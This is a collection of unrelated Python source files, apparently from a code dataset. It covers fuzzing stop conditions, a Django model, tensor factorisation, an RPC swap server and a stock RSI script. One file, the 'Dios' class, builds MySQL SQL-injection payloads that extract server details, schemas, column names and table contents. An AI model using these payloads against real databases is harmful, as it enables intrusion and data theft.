# Copyright 2022 Garda Technologies, LLC. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Originally written by Valery Korolyov <[email protected]>
from typing import Callable, Dict, Optional, Tuple, Any
from time import time
import os
import logging
log = logging.getLogger(__name__)
from bugbane.modules.stats.fuzz.fuzz_stats import FuzzStats
class StopConditionError(Exception):
"""Exception class for errors that happen in stop condition related routines"""
class StopConditions:
"""
Class that holds time-based stop conditions
"""
registry: Dict[str, Callable[[FuzzStats, int], bool]] = {}
@classmethod
def register(cls, name: str) -> Callable[[FuzzStats, int], bool]:
"""Register stop condition in internal registry"""
def wrapper(
wrapped: Callable[[FuzzStats, int], bool]
) -> Callable[[FuzzStats, int], bool]:
if name in cls.registry:
log.warning("replacing '%s' in %s registry", name, cls.__name__)
cls.registry[name] = wrapped
return wrapped
return wrapper
@classmethod
def get(cls, wanted_condition: str) -> Callable[[FuzzStats, int], bool]:
"""Return stop condition function"""
if wanted_condition not in cls.registry:
raise TypeError(
f"stop condition {wanted_condition} is not registered in {cls.__name__}"
)
return cls.registry[wanted_condition]
@classmethod
def met(cls, wanted_condition: str, stats: FuzzStats, seconds: int) -> bool:
"""Check if stop condition met"""
return cls.get(wanted_condition)(stats, seconds)
@StopConditions.register("time_without_finds")
def time_without_finds(stats: FuzzStats, seconds: int) -> bool:
"""The last new path was found N seconds ago (across all instances)"""
now = int(time())
stamp = stats.last_path_timestamp
log.trace(
"now=%s, stamp=%s, now-stamp=%s seconds=%s", now, stamp, now - stamp, seconds
)
return stamp > 0 and (now - stamp) >= seconds
@StopConditions.register("real_run_time")
def real_run_time(stats: FuzzStats, seconds: int) -> bool:
"""Actual test time is N or more seconds"""
now = int(time())
return (now - stats.start_timestamp) >= seconds
@StopConditions.register("total_run_time")
def total_run_time(stats: FuzzStats, seconds: int) -> bool:
"""
Total run time (summed across all instances) is N or more seconds.
FuzzStats holds the oldest fuzzer start timestamp, so it is assumed that
all fuzzers started at the same time.
"""
now = int(time())
return stats.num_instances * (now - stats.start_timestamp) >= seconds
def detect_required_stop_condition(
environ: Optional[Dict[str, str]] = None, bane_vars: Optional[Dict[str, Any]] = None
) -> Tuple[str, int]:
"""
Detects the condition for stopping the fuzzing job.
Returns tuple: (stop condition function name, time in seconds).
Note: bane_vars is not used as of now.
Returns the first condition detected:
env var CERT_FUZZ_DURATION set? -> time_without_finds with the specified time
env var CERT_FUZZ_LEVEL set? -> time_without_finds with a predefined time
env var FUZZ_DURATION set? -> real_run_time with the specified time
otherwise -> real_run_time with a default of 10 minutes
"""
env = environ or os.environ
bane_vars = bane_vars or {}
log.trace("env size is %d, vars size is %d", len(env), len(bane_vars))
cert_fuzz_duration = env.get("CERT_FUZZ_DURATION")
cert_fuzz_level = env.get("CERT_FUZZ_LEVEL")
ci_fuzz_duration = env.get("FUZZ_DURATION")
try:
if cert_fuzz_duration is not None:
return ("time_without_finds", int(cert_fuzz_duration))
cert_fuzz_levels_time_without_finds = {
4: 2 * 60 * 60, # control level 4 -> 2 hours without new finds
3: 4 * 60 * 60,
2: 8 * 60 * 60,
}
if cert_fuzz_level is not None:
duration = cert_fuzz_levels_time_without_finds[int(cert_fuzz_level)]
return ("time_without_finds", duration)
if ci_fuzz_duration is not None:
return ("real_run_time", int(ci_fuzz_duration))
except ValueError as e:
raise StopConditionError(f"Bad environment variable value ({e})") from e
except KeyError as e:
supported_levels = ", ".join(
str(x) for x in cert_fuzz_levels_time_without_finds
)
raise StopConditionError(
f"Supported CERT_FUZZ_LEVEL values: {supported_levels}.\n"
"For other options please use CERT_FUZZ_DURATION=<seconds>"
) from e
log.warning("Wasn't able to detect stop condition. Using default of 10 minutes")
return ("real_run_time", 10 * 60)
| python |
"""
Projects module.
By default, only projects that are listed in the configuration are
loaded automatically. See configuration variables:
*_PLUGINS_AUTOLOAD
*_PLUGINS_PROJECTS
"""
import logging
import importlib
from benchbuild.settings import CFG
LOG = logging.getLogger(__name__)
def discover():
if CFG["plugins"]["autoload"]:
project_plugins = CFG["plugins"]["projects"].value
for project_plugin in project_plugins:
try:
importlib.import_module(project_plugin)
except ImportError as import_error:
LOG.error("Could not find '%s'", project_plugin)
LOG.error("ImportError: %s", import_error.msg)
| python |
# Copyright 2018, Michael DeHaan LLC
# License: Apache License Version 2.0 + Commons Clause
#---------------------------------------------------------------------------
# organization.py - a model of an organization like GitHub organizations
# holding lots of repos for import
#---------------------------------------------------------------------------
import json
from django.contrib.auth.models import Group, User
from django.db import models
from vespene.manager import Shared
from vespene.common.logger import Logger
from vespene.models import BaseModel, as_dict
from vespene.models.build import QUEUED, RUNNING, UNKNOWN
from vespene.manager.permissions import PermissionsManager
permissions = PermissionsManager()
LOG = Logger()
class Organization(models.Model, BaseModel):
class Meta:
db_table = 'organizations'
indexes = [
models.Index(fields=['name'], name='organization_name_idx'),
]
name = models.CharField(unique=True, max_length=512)
description = models.TextField(blank=True)
organization_type = models.CharField(max_length=100)
organization_identifier = models.CharField(max_length=512, help_text="example: 'vespene-io' for github.com/vespene-io/")
api_endpoint = models.CharField(max_length=512, blank=True, default="", help_text="blank, or https://{hostname}/api/v3 for GitHub Enterprise")
import_enabled = models.BooleanField(default=True)
import_without_dotfile = models.BooleanField(default=False)
overwrite_project_name = models.BooleanField(default=True)
overwrite_project_script = models.BooleanField(default=True)
overwrite_configurations = models.BooleanField(default=True)
allow_pipeline_definition = models.BooleanField(default=True)
allow_worker_pool_assignment = models.BooleanField(default=True)
auto_attach_ssh_keys = models.ManyToManyField('SshKey', related_name='+', blank=True, help_text="SSH keys to be assigned to imported projects")
default_worker_pool = models.ForeignKey('WorkerPool', related_name='+', null=False, on_delete=models.PROTECT)
force_rescan = models.BooleanField(default=False, help_text="rescan once at the next opportunity, ignoring refresh_minutes")
refresh_minutes = models.IntegerField(default=120)
scm_login = models.ForeignKey('ServiceLogin', related_name='organizations', on_delete=models.SET_NULL, null=True, help_text="... or add an SSH key in the next tab", blank=True)
worker_pool = models.ForeignKey('WorkerPool', related_name='organizations', null=False, on_delete=models.PROTECT)
created_by = models.ForeignKey(User, related_name='+', null=True, blank=True, on_delete=models.SET_NULL)
last_build = models.ForeignKey('Build', null=True, blank=True, related_name='last_build_for_organization', on_delete=models.SET_NULL)
active_build = models.ForeignKey('Build', null=True, blank=True, related_name='active_build_for_organization', on_delete=models.SET_NULL)
last_successful_build = models.ForeignKey('Build', null=True, blank=True, related_name='last_successful_build_for_organization', on_delete=models.SET_NULL)
def __str__(self):
return self.name
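# Illustrative sketch (objects and values are hypothetical): creating an
# organization record that mirrors a GitHub org for import; `pool` is assumed
# to be an existing WorkerPool instance.
#
#   org = Organization.objects.create(
#       name="Example Org",
#       organization_type="github",
#       organization_identifier="vespene-io",
#       default_worker_pool=pool,
#       worker_pool=pool,
#   )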
| python |
#coding: utf-8
import sys
from common import reverse_items
if len(sys.argv) != 3:
print "Usage: ", sys.argv[0], "[input] [output]"
exit(1)
reverse_items(sys.argv[1], sys.argv[2])
| python |
import binascii
class Dios:
startSQLi = "0x3C73716C692D68656C7065723E" # <sqli-helper>
endSQLi = "0x3C2F73716C692D68656C7065723E" # </sqli-helper>
endData = "0x3c656e642f3e" # <end/>
def build(self, query):
return f"(select+concat({self.startSQLi},(select+concat({query})),{self.endSQLi}))"
def dump_data(self, tables, columns, database, level=1):
response_query = ''
if level == 1:
column_query = ''
for column in columns:
column = column.strip(' ')
query = "0x" + self.strTohex(f"<{column}>");
query += f",{column},"
query += "0x" + self.strTohex(f"</{column}>");
column_query += query + ","
column_query = column_query.strip(",")
response_query = f"(SELECT+GROUP_CONCAT({column_query},{self.endData})+FROM+{database}.{tables})"
return response_query
def get_information(self,level=1):
if level == 1:
dios = f"(select+concat({self.startSQLi},(select+concat({self.hostname()},{self.port()},{self.user()},{self.version()},{self.database()},{self.os_version()},{self.mechine_version()},{self.base_dir()},{self.data_dir()},{self.ssl()},{self.openssl()},{self.symlink()},{self.socket()})),{self.endSQLi}))"
return dios
def show_columns(self, table_name, dbname, level=1):
if level == 1:
dios = f"(select+group_concat(column_name)+from+information_schema.columns+where+table_name=0x{self.strTohex(table_name)}+and+table_schema=0x{self.strTohex(dbname)})"
return dios
# Get all databases
def databases(self, level=1):
if level == 1:
dios = f"(select+group_concat(DISTINCT(table_schema))+from+information_schema.columns)"
return dios
def strTohex(self, string):
hexa = binascii.hexlify(string.encode("utf-8"))
hexa = hexa.decode("utf-8")
return hexa
def hexTostr(self, hexa):
string = binascii.unhexlify(hexa.encode("utf-8"))
string = string.decode("utf-8")
return string
def addslashes(self, s):
d = {'"':'\\"', "'":"\\'", "\0":"\\\0", "\\":"\\\\"}
return ''.join(d.get(c, c) for c in s)
# Methods that get information from the target
# Hostname
def hostname(self, level=1):
if level == 1:
hostname = f"0x{self.strTohex('<hostname()>')},/*!00000@@hostname*/,0x{self.strTohex('</hostname()>')}"
# print(hostname, level)
return hostname
# Port
def port(self, level=1):
if level == 1:
port = f"0x{self.strTohex('<port()>')},/*!00000@@port*/,0x{self.strTohex('</port()>')}"
return port
# Version
def version(self, level=1):
if level == 1:
version = f"0x{self.strTohex('<version>')},/*!00000@@version*/,0x{self.strTohex('</version>')}"
return version
# User
def user(self, level=1):
if level == 1:
user = f"0x{self.strTohex('<user()>')},/*!00000user()*/,0x{self.strTohex('</user()>')}"
return user
# Database
def database(self, level=1):
if level == 1:
database = f"0x{self.strTohex('<schema()>')},/*!00000schema()*/,0x{self.strTohex('</schema()>')}"
return database
# os_version
def os_version(self, level=1):
if level == 1:
os_version = f"0x{self.strTohex('<os_version>')},/*!00000@@version_compile_os*/,0x{self.strTohex('</os_version>')}"
return os_version
# mechine_version
def mechine_version(self, level=1):
if level == 1:
mechine_version = f"0x{self.strTohex('<mechine_version>')},/*!00000@@VERSION_COMPILE_MACHINE*/,0x{self.strTohex('</mechine_version>')}"
return mechine_version
# base_dir
def base_dir(self, level=1):
if level == 1:
base_dir = f"0x{self.strTohex('<base_dir>')},/*!00000@@basedir*/,0x{self.strTohex('</base_dir>')}"
return base_dir
# data_dir
def data_dir(self, level=1):
if level == 1:
data_dir = f"0x{self.strTohex('<data_dir>')},/*!00000@@datadir*/,0x{self.strTohex('</data_dir>')}"
return data_dir
# ssl
def ssl(self, level=1):
if level == 1:
ssl = f"0x{self.strTohex('<ssl>')},/*!00000@@GLOBAL.have_ssl*/,0x{self.strTohex('</ssl>')}"
return ssl
# openssl
def openssl(self, level=1):
if level == 1:
openssl = f"0x{self.strTohex('<openssl>')},/*!00000@@GLOBAL.have_openssl*/,0x{self.strTohex('</openssl>')}"
return openssl
# symlink
def symlink(self, level=1):
if level == 1:
symlink = f"0x{self.strTohex('<symlink>')},/*!00000@@GLOBAL.have_symlink*/,0x{self.strTohex('</symlink>')}"
return symlink
# socket
def socket(self, level=1):
if level == 1:
socket = f"0x{self.strTohex('<socket>')},/*!00000@@socket*/,0x{self.strTohex('</socket>')}"
return socket
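# Illustrative usage sketch: how the hex helpers and payload builders above
# compose (output abbreviated; table and database names are hypothetical).
#
#   d = Dios()
#   d.strTohex("<user>")               # -> '3c757365723e'
#   d.hexTostr("3c757365723e")         # -> '<user>'
#   d.show_columns("users", "testdb")  # -> "(select+group_concat(column_name)+from+information_schema.columns+...)"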
| python |
'''
Created on Nov 11, 2018
@author: nilson.nieto
'''
lst =[1,2,3,4,5,6,7]
print(list(map(lambda a : a**2,lst))) | python |
import warnings
import numpy as np
from hottbox.algorithms.decomposition.cpd import BaseCPD
from hottbox.core.structures import Tensor
from hottbox.core.operations import khatri_rao, hadamard
from hottbox.utils.generation.basic import super_diag_tensor
# TODO: Organise this better - lazy work around used
class CMTF(BaseCPD):
""" Coupled Matrix and Tensor factorization for two ``Tensors`` of order n and 2 with respect to a specified `rank`.
Computed via alternating least squares (ALS)
Parameters
----------
max_iter : int
Maximum number of iteration
epsilon : float
Threshold for the relative error of approximation.
tol : float
Threshold for convergence of factor matrices
random_state : int
verbose : bool
If True, enable verbose output
Attributes
----------
cost : list
A list of relative approximation errors at each iteration of the algorithm.
References
----------
- Acar, Evrim, Evangelos E. Papalexakis, Gozde Gurdeniz, Morten A. Rasmussen,
Anders J. Lawaetz, Mathias Nilsson and Rasmus Bro.
“Structure-revealing data fusion.” BMC Bioinformatics (2013).
- Jeon, Byungsoo & Jeon, Inah & Sael, Lee & Kang, U. (2016).
SCouT: Scalable coupled matrix-tensor factorization—Algorithm and discoveries.
Int. Conf. Data Eng.. 811-822. 10.1109/ICDE.2016.7498292.
"""
# TODO: change init use requiring a change in TensorCPD
def __init__(self, max_iter=50, epsilon=10e-3, tol=10e-5,
random_state=None, verbose=False) -> None:
super(CMTF, self).__init__(init='random',
max_iter=max_iter,
epsilon=epsilon,
tol=tol,
random_state=random_state,
verbose=verbose)
self.cost = []
def copy(self):
""" Copy of the CPD algorithm as a new object """
new_object = super(CMTF, self).copy()
new_object.cost = []
return new_object
@property
def name(self):
""" Name of the decomposition
Returns
-------
decomposition_name : str
"""
decomposition_name = super(CMTF, self).name
return decomposition_name
def decompose(self, tensor, mlst, rank):
""" Performs factorisation using ALS on the two instances of ``tensor``
with respect to the specified ``rank``
Parameters
----------
tensor : Tensor
Multi-dimensional data to be decomposed
mlst : List of `Tensor`
List of two-dimensional `Tensor` to be decomposed
rank : tuple
Desired Kruskal rank for the given ``tensor``. Should contain only one value.
If it is greater than any of the dimensions, then random initialisation is used
Returns
-------
(fmat_a, fmat_b, t_recon, m_recon) : List(np.ndarray) or np.ndarray
fmat_a, fmat_b are the list of components obtained by applying CMTF
t_recon, m_recon : The reconstructed tensor and list of matrices
"""
if not isinstance(tensor, Tensor):
raise TypeError("Parameter `tensor` should be `Tensor`!")
if not isinstance(mlst, list):
raise TypeError("Parameter `mlst` should be a list of `Tensor`!")
if not isinstance(rank, tuple):
raise TypeError("Parameter `rank` should be passed as a tuple!")
if len(rank) != 1:
raise ValueError("Parameter `rank` should be tuple with only one value!")
if not all(isinstance(m, Tensor) for m in mlst):
raise TypeError("Parameter `mlst` should be a list of `Tensor`!")
if not all(m.order == 2 for m in mlst):
raise ValueError("All elements of `mlst` should be of order 2. It is a list of matrices!")
modes = np.array([list(m.shape) for m in mlst])
num_modes = len(modes)
fmat_a, fmat_b = self._init_fmat(modes[:, 0], modes[:, 1], rank)
norm = tensor.frob_norm
for n_iter in range(self.max_iter):
# Update tensor factors
for i in range(num_modes):
_v = hadamard([np.dot(a_i.T, a_i) for k, a_i in enumerate(fmat_a) if k != i])
_v += fmat_b[i].T.dot(fmat_b[i])
kr_result = khatri_rao(fmat_a, skip_matrix=i, reverse=True)
_prod_a = np.concatenate([tensor.unfold(i, inplace=False).data, mlst[i].data], axis=1)
_prod_b = np.concatenate([kr_result.T, fmat_b[i].T], axis=1).T
fmat_a[i] = _prod_a.dot(_prod_b).dot(np.linalg.pinv(_v))
for i in range(num_modes):
fmat_b[i] = mlst[i].data.T.dot(np.linalg.pinv(fmat_a[i]).T)
t_recon, m_recon = self._reconstruct(fmat_a, fmat_b, num_modes)
residual = np.linalg.norm(tensor.data-t_recon.data)
for i in range(num_modes):
residual += np.linalg.norm(mlst[i].data-m_recon[i].data)
self.cost.append(abs(residual)/norm)
if self.verbose:
print('Iter {}: relative error of approximation = {}'.format(n_iter, self.cost[-1]))
# Check termination conditions
if self.cost[-1] <= self.epsilon:
if self.verbose:
print('Relative error of approximation has reached the acceptable level: {}'
.format(self.cost[-1]))
break
if self.converged:
if self.verbose:
print('Converged in {} iteration(s)'.format(len(self.cost)))
break
if self.verbose and not self.converged and self.cost[-1] > self.epsilon:
print('Maximum number of iterations ({}) has been reached. '
'Variation = {}'.format(self.max_iter, abs(self.cost[-2] - self.cost[-1])))
# TODO: possibly make another structure
return fmat_a, fmat_b, t_recon, m_recon
@property
def converged(self):
""" Checks convergence of the CPD-ALS algorithm.
Returns
-------
bool
"""
# This ensures that the cost has been computed at least twice, without checking iterations
try:
is_converged = abs(self.cost[-2] - self.cost[-1]) <= self.tol
except IndexError:
is_converged = False
return is_converged
def _init_fmat(self, shape_i, shape_j, rank):
""" Initialisation of matrices used in CMTF
Parameters
----------
shape_i : np.ndarray(int)
Shape[0] of all matrices
shape_j : np.ndarray(int)
Shape[1] of all matrices
rank : int
The rank specified for factorisation
Returns
-------
(fmat_a, fmat_b) : List(np.ndarray)
Two lists of the factor matrices
"""
self.cost = [] # Reset cost every time when method decompose is called
_r = rank[0]
if (np.array(shape_i) < _r).sum() != 0:
warnings.warn(
"Specified rank is greater then one of the dimensions of a tensor ({} > {}).\n"
"Factor matrices have been initialized randomly.".format(_r, shape_i), RuntimeWarning
)
fmat_a = [np.random.randn(i_n, _r) for i_n in shape_i]
fmat_b = [np.random.randn(j_n, _r) for j_n in shape_j]
return fmat_a, fmat_b
@staticmethod
def _reconstruct(fmat_a, fmat_b, n_mat):
""" Reconstruct the tensor and matrix after the coupled factorisation
Parameters
----------
fmat_a : List(np.ndarray)
Multidimensional data obtained from the factorisation
fmat_b : List(np.ndarray)
Multidimensional data obtained from the factorisation
n_mat : int
Number of matrices provided to fuse
Returns
-------
(core_tensor, lrecon) : np.ndarray or List(np.ndarray)
Reconstructed tensor and list of matrices obtained from the factorisation
"""
core_values = np.repeat(np.array([1]), fmat_a[0].shape[1])
_r = (fmat_a[0].shape[1], )
core_shape = _r * len(fmat_a)
core_tensor = super_diag_tensor(core_shape, values=core_values)
for mode, fmat in enumerate(fmat_a):
core_tensor.mode_n_product(fmat, mode=mode, inplace=True)
lrecon = [Tensor(fmat_a[i].dot(fmat_b[i].T)) for i in range(n_mat)]
return core_tensor, lrecon
def plot(self):
print('At the moment, `plot()` is not implemented for the {}'.format(self.name))
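# Illustrative usage sketch (shapes and rank are assumptions): coupling a
# 3rd-order tensor with three matrices whose first dimensions match the
# tensor's mode sizes. `np` and `Tensor` are already imported above.
#
#   t = Tensor(np.random.randn(5, 6, 7))
#   mlst = [Tensor(np.random.randn(s, 3)) for s in (5, 6, 7)]
#   cmtf = CMTF(max_iter=25, verbose=True)
#   fmat_a, fmat_b, t_recon, m_recon = cmtf.decompose(t, mlst, rank=(2,))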
| python |
import pathlib
import pandas as pd
from util import Util
# Returns a pandas DataFrame filtered by the specified conditions
class Dataset:
def __init__(
self,
feature_names,
target_name="target",
train_years=None,
test_years=None,
cities=None,
):
if feature_names is None:
feature_names = self.get_all_feature_names()
# Name of the target variable
self.target_name = target_name
self.train_years = train_years
self.test_years = test_years
self.cities = cities
# Columns used only inside Dataset
self.secret_feature_names = ["県名", "date"]
self.feature_names = feature_names.copy()
# iterate over a copy so that removing items below does not skip elements
for name in list(self.secret_feature_names):
if name in feature_names:
self.secret_feature_names.remove(name)
else:
self.feature_names.append(name)
base_dataset = Util.load_feature("basic_data")
datasets_list = []
for name in self.feature_names:
if name in base_dataset.columns:
datasets_list.append(base_dataset[name])
else:
feature = Util.load_feature(name)
datasets_list.append(feature)
self.dataset = pd.DataFrame().join(datasets_list, how="outer")
@classmethod
def get_all_feature_names(cls):
# Get the names of all features
data = []
basic_data = Util.load_feature("basic_data")
globbed_files = pathlib.Path("./../features/").glob("*.pkl")
for globbed_file in globbed_files:
file_name = globbed_file.name
if file_name == "basic_data.pkl":
continue
data.append(Util.load_feature(file_name[:-4]))
data = basic_data.join(data, how="outer")
return data.columns
# Filter by year
def __select_by_year(self, years, data=None):
def __to_year(data):
return data.year
if data is None:
data = self.dataset.copy()
if type(years) == int:
years = [years]
# Drop rows that have no date information
data = data.dropna(subset=["date"])
adopted_index = False
for year in years:
adopted_index = (adopted_index) | (data["date"].map(__to_year) == year)
return data[adopted_index]
# Filter by prefecture name
def __select_by_city(self, city_names, data=None):
if type(city_names) == str:
city_names = [city_names]
if data is None:
data = self.dataset.copy()
# Drop rows that have no prefecture information
data = data.dropna(subset=["県名"])
return data[data["県名"].isin(city_names)]
# Filter by year and prefecture name, and return a copy
def get_data(self, year, city):
data = self.__select_by_year(year)
data = self.__select_by_city(city, data)
data = data.drop(self.secret_feature_names, axis=1)
data = data.dropna(subset=[self.target_name])
data = data.dropna()
return data
# Data for fiscal years 2008-2017
def get_train(self):
if self.train_years is not None and self.cities is not None:
return self.get_data(self.train_years, self.cities)
else:
return self.get_data([y for y in range(2008, 2018)], "tokyo")
# Data for fiscal years 2018 and 2019
def get_test(self, option=None):
if self.test_years is not None and self.cities is not None:
return self.get_data(self.test_years, self.cities)
else:
return self.get_data([2018, 2019], "tokyo")
def add_past_day_data(self, days_ago, features=None):
if features is None:
features = list(self.dataset.columns.copy())
for name in self.secret_feature_names:
features.remove(name)
if type(days_ago) == int:
days_ago = [days_ago]
for i in days_ago:
for name in features:
self.dataset["p" + str(i) + name] = self.dataset[name].shift(-i)
| python |
from openstatesapi.jurisdiction import make_jurisdiction
J = make_jurisdiction('ga')
J.url = 'http://georgia.gov'
| python |
import numpy as np
import zmq
import logging
import time
from multiprocessing import Process
from sigvisa.infer.swap_rpc.sg_client import run_client
from sigvisa.infer.swap_rpc.swap_server import SwapServer
from sigvisa.infer.swap_rpc.swap_moves import crossover_uatemplates, crossover_event_region_move, swap_events_move
from sigvisa.infer.swap_rpc.serialization import serialize, deserialize
class SgSwapServer(SwapServer):
def __init__(self, *args, **kwargs):
super(SgSwapServer, self).__init__(*args, **kwargs)
self.scbs = {}
self.raw_signals = {}
def do_swap_helper(self, client1, client2):
socket1 = self.swap_sockets[client1]
socket2 = self.swap_sockets[client2]
# both clients should check in to be ready to receive commands
ack1 = socket1.recv()
ack2 = socket2.recv()
assert(ack1 == "SWAPPING")
assert(ack2 == "SWAPPING")
sg1 = SgRpcShim(socket1)
sg2 = SgRpcShim(socket2)
if client1 not in self.scbs:
self.scbs[client1] = sg1.get_scbs()
self.raw_signals[client1] = sg1.get_raw()
if client2 not in self.scbs:
self.scbs[client2] = sg2.get_scbs()
self.raw_signals[client2] = sg2.get_raw()
assert(self.scbs[client1] == self.scbs[client2])
scbs = list(self.scbs[client1])
raw1 = self.raw_signals[client1]
raw2 = self.raw_signals[client2]
"""
for scb in scbs:
accepted = crossover_uatemplates(sg1, sg2, scb, raw1, raw2,
crossover_period_s=5.0,
crossover_period_pre_s = 2.0)
logging.info("crossover at %s: accepted %s" % (str(scb), str(accepted)))
sg1.move_finished("crossover_uatemplates_short", accepted)
sg2.move_finished("crossover_uatemplates_short", accepted)
for scb in scbs:
accepted = crossover_uatemplates(sg1, sg2, scb, raw1, raw2)
logging.info("crossover at %s: accepted %s" % (str(scb), str(accepted)))
sg1.move_finished("crossover_uatemplates", accepted)
sg2.move_finished("crossover_uatemplates", accepted)
"""
accepted = crossover_event_region_move(sg1, sg2, raw1, raw2,
crossover_radius_km=1000,
crossover_radius_s=2000)
logging.info("event region crossover accepted %s" % (str(accepted)))
sg1.move_finished("crossover_event_region", accepted)
sg2.move_finished("crossover_event_region", accepted)
accepted = swap_events_move(sg1, sg2, raw1, raw2)
logging.info("event swap accepted %s" % (str(accepted)))
sg1.move_finished("crossover_event_swap", accepted)
sg2.move_finished("crossover_event_swap", accepted)
sg1.done()
sg2.done()
self._cleanup_swap(client1, client2)
class SgRpcShim(object):
def __init__(self, socket):
self.socket = socket
def get_raw(self):
return self._send_cmd("GET_RAW", kwargs={})
def get_scbs(self):
return self._send_cmd("GET_SCBS", kwargs={})
def get_event_locs(self):
cmd = "GET_EVENT_LOCS"
return self._send_cmd(cmd, kwargs={})
def get_event_templates(self, eid):
kwargs = {"eid": eid}
cmd = "GET_EVENT_TEMPLATES"
return self._send_cmd(cmd, kwargs=kwargs)
def kill_event(self, eid):
kwargs = {"eid": eid}
cmd = "KILL_EVENT"
return self._send_cmd(cmd, kwargs=kwargs)
def birth_event(self, evdict, tmvals, force_id=None):
kwargs = {"evdict": evdict, "tmvals": tmvals, "force_id": force_id}
cmd = "BIRTH_EVENT"
return self._send_cmd(cmd, kwargs=kwargs)
def current_log_p(self):
cmd = "CURRENT_LOG_P"
return self._send_cmd(cmd, kwargs={})
def current_log_p_breakdown(self):
cmd = "BREAKDOWN"
return self._send_cmd(cmd, kwargs={})
def birth_template(self, scb, tmvals, force_id=None):
kwargs = {"scb": scb, "tmvals": tmvals, "force_id": force_id}
cmd = "BIRTH_TEMPLATE"
return self._send_cmd(cmd, kwargs)
def kill_template(self, tmid):
kwargs = {"tmid": tmid}
cmd = "KILL_TEMPLATE"
return self._send_cmd(cmd, kwargs)
def set_template(self, tmid, tmvals):
kwargs = {"tmvals": tmvals, "tmid": tmid}
cmd = "SET_TEMPLATE"
return self._send_cmd(cmd, kwargs)
def logp_at_scb(self, scb):
kwargs = {"scb": scb}
cmd = "LOGP_AT_SCB"
return self._send_cmd(cmd, kwargs)
def uatemplates_at_scb(self, scb):
kwargs = {"scb": scb}
cmd = "UATEMPLATES_AT_SCB"
return self._send_cmd(cmd, kwargs)
def dump_img_scb(self, scb, label):
cmd = "DUMP_IMG_SCB"
kwargs = {"scb": scb, "label": label}
return self._send_cmd(cmd, kwargs)
def debug(self):
msg = "DEBUG"
self.socket.send(msg)
def move_finished(self, move_name, accepted):
cmd = "COUNT"
kwargs = {"move_name": move_name, "accepted": accepted}
return self._send_cmd(cmd, kwargs)
def done(self):
msg = "DONE"
self.socket.send(msg)
def _send_cmd(self, cmd, kwargs):
argstr = serialize(kwargs)
msg = cmd + " " + argstr
self.socket.send(msg)
rstr = self.socket.recv()
resp = deserialize(rstr)
#print "cmd", cmd, "response", rstr, "deserialized", resp
return resp
def run_parallel_coarse_to_fine(names, specs,
server_only=False, client_only=None,
min_swap_s = 20.0,
max_swap_s = 45.0,
allowable_wait_s = 0.5):
# names is an ordered list of strings naming each thread.
# - we will only ever run swap moves between adjacent threads
# specs is a dict mapping name:(modelspec, runspec)
processes = {}
def chain_neighbors(a):
# given a list, return a dict encoding the graph where each
# entry is connected to its predecessor and successor.
d = {}
for i, x in enumerate(a):
d[x] = []
if i > 0:
d[x].append(a[i-1])
if i < len(a)-1:
d[x].append(a[i+1])
return d
control_port=5555
neighbors = chain_neighbors(names)
if client_only is not None:
name = client_only
ms, rs = specs[name]
run_client(name, ms, rs, control_port)
return
if not server_only:
for name in names:
ms, rs = specs[name]
processes[name] = Process(target=run_client, kwargs={"name": name,
"modelspec": ms,
"runspec": rs,
"port": control_port})
processes[name].start()
serv = SgSwapServer(neighbors=neighbors,
min_swap_s = min_swap_s,
allowable_wait_s = allowable_wait_s,
port=control_port)
rootLogger = logging.getLogger()
rootLogger.setLevel("INFO")
def any_children_alive():
if server_only:
return True
for name in names:
if processes[name].is_alive():
return True
return False
while any_children_alive():
serv.process()
logging.debug( "state dump: %s " % serv.client_state)
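# Illustrative sketch (the spec objects are assumptions): run_parallel_coarse_to_fine()
# expects an ordered list of chain names and a dict mapping each name to its
# (modelspec, runspec) pair; swap moves only run between adjacent names.
#
#   names = ["coarse", "medium", "fine"]
#   specs = {name: (modelspecs[name], runspecs[name]) for name in names}
#   run_parallel_coarse_to_fine(names, specs)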
| python |
#!/usr/bin/env python
# coding: utf-8
# In[79]:
'''
https://github.com/bbmusa
'''
from pandas_datareader import data as pdr
from yahoo_fin import stock_info as si
# In[2]:
import pandas as pd
# In[3]:
import numpy as np
# In[7]:
tickers = si.tickers_nifty50()
# In[17]:
tickers.remove('MM.NS')
# In[72]:
start_date = '2021-11-10'
end_date = '2022-02-14'
# In[73]:
'''
J. Welles Wilder's RSI indicator simply finds blue-chip gold mines for you.
'''
def download_all_stock_data(all_stock_symbols, start_date, end_date):
def download_stock_data(single_symbol):
print(' Downloading '+single_symbol+' data ')
# try:
tmp1=pdr.get_data_yahoo(single_symbol,start=start_date,end=end_date)
# except KeyError:
# pass
return(tmp1)
downloaded_data=map(download_stock_data,all_stock_symbols)
return(pd.concat(downloaded_data,keys=all_stock_symbols, names=['Ticker','Date']))
# In[74]:
stock_data=download_all_stock_data(tickers, start_date, end_date)
fileName = 'downloadedData.pkl'
stock_data.to_pickle(fileName)
# In[80]:
'''
RSI = 100 - 100/(1+RS)
RS = Average gain / Average loss
This RSI is based on 14 periods, which means:
+ first average gain = sum of gains over the 14 periods / 14
+ first average loss = sum of losses over the 14 periods / 14
'''
def compute_RSI(data,period_RSI):
differencePrice = data['Close'].diff()
differencePriceValues=differencePrice.values
positive_differences=0
negative_differences=0
current_average_positive=0
current_average_negative=0
price_index=0
RSI=[]
for difference in differencePriceValues[1:]:
if difference>0:
positive_difference=difference
negative_difference=0
if difference<0:
negative_difference=np.abs(difference)
positive_difference=0
if difference==0:
negative_difference=0
positive_difference=0
if (price_index<period_RSI):
current_average_positive=current_average_positive+(1/period_RSI)*positive_difference
current_average_negative=current_average_negative+(1/period_RSI)*negative_difference
if(price_index==(period_RSI-1)):
if current_average_negative!=0:
RSI.append(100 - 100/(1+(current_average_positive/current_average_negative)))
else:
RSI.append(100)
else:
current_average_positive=((period_RSI-1)*current_average_positive+positive_difference)/(period_RSI)
current_average_negative=((period_RSI-1)*current_average_negative+negative_difference)/(period_RSI)
if current_average_negative!=0:
RSI.append(100 - 100/(1+(current_average_positive/current_average_negative)))
else:
RSI.append(100)
price_index=price_index+1
RSI_series=pd.Series(data=RSI,index=differencePrice.index[period_RSI:])
return(RSI_series)
# In[76]:
RSI_all_ticker=pd.Series(index=tickers)
for stock_symbol in tickers:
test1=compute_RSI(stock_data.loc[stock_symbol],28)
RSI_all_ticker.loc[stock_symbol]=test1[-1]
RSI_all_ticker.plot(figsize=(12,12))
